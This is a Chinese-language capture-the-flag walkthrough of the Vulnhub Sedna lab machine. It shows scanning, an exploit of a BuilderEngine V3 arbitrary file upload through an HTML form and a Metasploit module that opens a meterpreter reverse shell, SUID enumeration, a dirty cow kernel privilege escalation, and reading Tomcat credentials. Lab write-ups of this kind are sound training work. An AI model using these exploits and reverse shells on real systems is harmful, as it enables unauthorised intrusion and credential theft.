靶机狂魔：Vulnhub Sedna Writeup

• 靶机狂魔：Vulnhub Sedna Writeup

• 靶机介绍

• 信息搜集

• Get Shell

• Get Root

• post-exploitation

靶机介绍

该靶机具有4个flag

• shell * 1

• root * 1

• 后渗透阶段 * 2

信息搜集

开局一张图，内容全靠编。

• 端口扫描

PORT     STATE SERVICE
22/tcp   open  ssh
53/tcp   open  domain
80/tcp   open  http
110/tcp  open  pop3
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
143/tcp  open  imap
445/tcp  open  microsoft-ds
993/tcp  open  imaps
995/tcp  open  pop3s
8080/tcp open  http-proxy

• 目录扫描

codeception.yml

paths:
    tests: tests
    log: tests/_log
    data: tests/_data
    helpers: tests/_helpers
settings:
    bootstrap: _bootstrap.php
    suite_class: PHPUnit_Framework_TestSuite
    colors: false
    memory_limit: 1024M
    log: true
modules:
    config:
        Db:
            dsn: ''
            user: ''
            password: ''
            dump: tests/_data/dump.sql

http://192.168.18.216//files/

端口扫描还有一个8080端口，打开之后发现是一个Tomcat。开放了manager webapp and the host-manager webapp. 可以用来暴力破解。同时还有SSH服务可用来暴力破解。

使用msf暴力破解tomcat mgr页面，失败。

使用hydra 暴力破解 ssh，失败。

继续探索80端口的其他目录，从之前的搜集情况来看，80端口大概率是某个cms，但是具体的不知道。通过这个文件可以知道为BuilderEngine V3

https://www.exploit-db.com/exploits/40390
通过查阅资料发现，该cms存在任意文件上传漏洞。

Get Shell

漏洞URL：/themes/dashboard/assets/plugins/jquery-file-upload/server/php/
漏洞参数：files[]
有两种方式，本地构造文件上传的表单，或者使用msf集成的exp。

<html>
<body>
<form method="post" action="http://localhost/themes/dashboard/assets/plugins/jquery-file-upload/server/php/" enctype="multipart/form-data">
<input type="file" name="files[]" />
<input type="submit" value="send" />
</form>
</body>
</html>
          

https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/multi/http/builderengine_upload_exec.md

msf6 auxiliary(scanner/http/tomcat_mgr_login) > use builderengine_upload_exec
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/builderengine_upload_exec) > set RHOSTS 192.168.18.216
RHOSTS => 192.168.18.216
msf6 exploit(multi/http/builderengine_upload_exec) > check
[*] 192.168.18.216:80 - The target appears to be vulnerable.
msf6 exploit(multi/http/builderengine_upload_exec) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf6 exploit(multi/http/builderengine_upload_exec) > exploit

[*] Started reverse TCP handler on 192.168.18.218:4444
[+] Our payload is at: qcFgMIDftfRcaF.php. Calling payload...
[*] Calling payload...
[*] Sending stage (39927 bytes) to 192.168.18.216
[+] Deleted qcFgMIDftfRcaF.php
[*] Meterpreter session 1 opened (192.168.18.218:4444 -> 192.168.18.216:58329) at 2023-11-09 22:52:10 +0800

获取到shell。当然也可以传一个revere shell 的 php 脚本上去。
获取到第一个flag。

Get Root

机器是Linux，

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;

执行结果：

find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/ping
/bin/umount
/bin/fusermount
/bin/ping6
/usr/bin/at
/usr/bin/lppasswd
/usr/bin/traceroute6.iputils
/usr/bin/newgrp
/usr/bin/mtr
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/procmail
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/passwd
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/pt_chown
/usr/lib/authbind/helper
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/sbin/pppd
/usr/sbin/uuidd
/sbin/mount.cifs
/sbin/mount.nfs

寻找机器上有哪些环境

• Python

python -V
Python 2.7.6
python3 -V
Python 3.4.0

通过python获取交互shell

python -c 'import pty;pty.spawn("/bin/bash")'

查看Linux内核

www-data@Sedna:/$ uname -a
uname -a
Linux Sedna 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux
www-data@Sedna:/$

使用msf可以发现存在exp

msf6 > search 3.13.0

Matching Modules
================

   #  Name                                    Disclosure Date  Rank  Check  Description
   -  ----                                    ---------------  ----  -----  -----------
   0  exploit/linux/local/overlayfs_priv_esc  2015-06-16       good  Yes    Overlayfs Privilege Escalation

但是利用失败。

Linux Kernel 2.6.22 < 3.9，可以使用dirty cow进行提权
在具有写权限的目录下远程下载编译好的exp

打了之后，环境直接崩了。怀疑是exp用错了。
重新用一个就行，https://www.exploit-db.com/exploits/40839

拿到root shell之后，

echo 0 /proc/sys/vm/dirty_writeback_centisecs

避免机器崩溃。

post-exploitation

• Tomcat用户的密码

之前信息搜集时，发现8080是tomcat，其中flag3就是tomcat的密码
etc/tomcat7/tomcat-users.xml.

• crackmeforpoints密码解密

原文始发于微信公众号（红蓝安全）：靶机狂魔：Vulnhub Sedna Writeup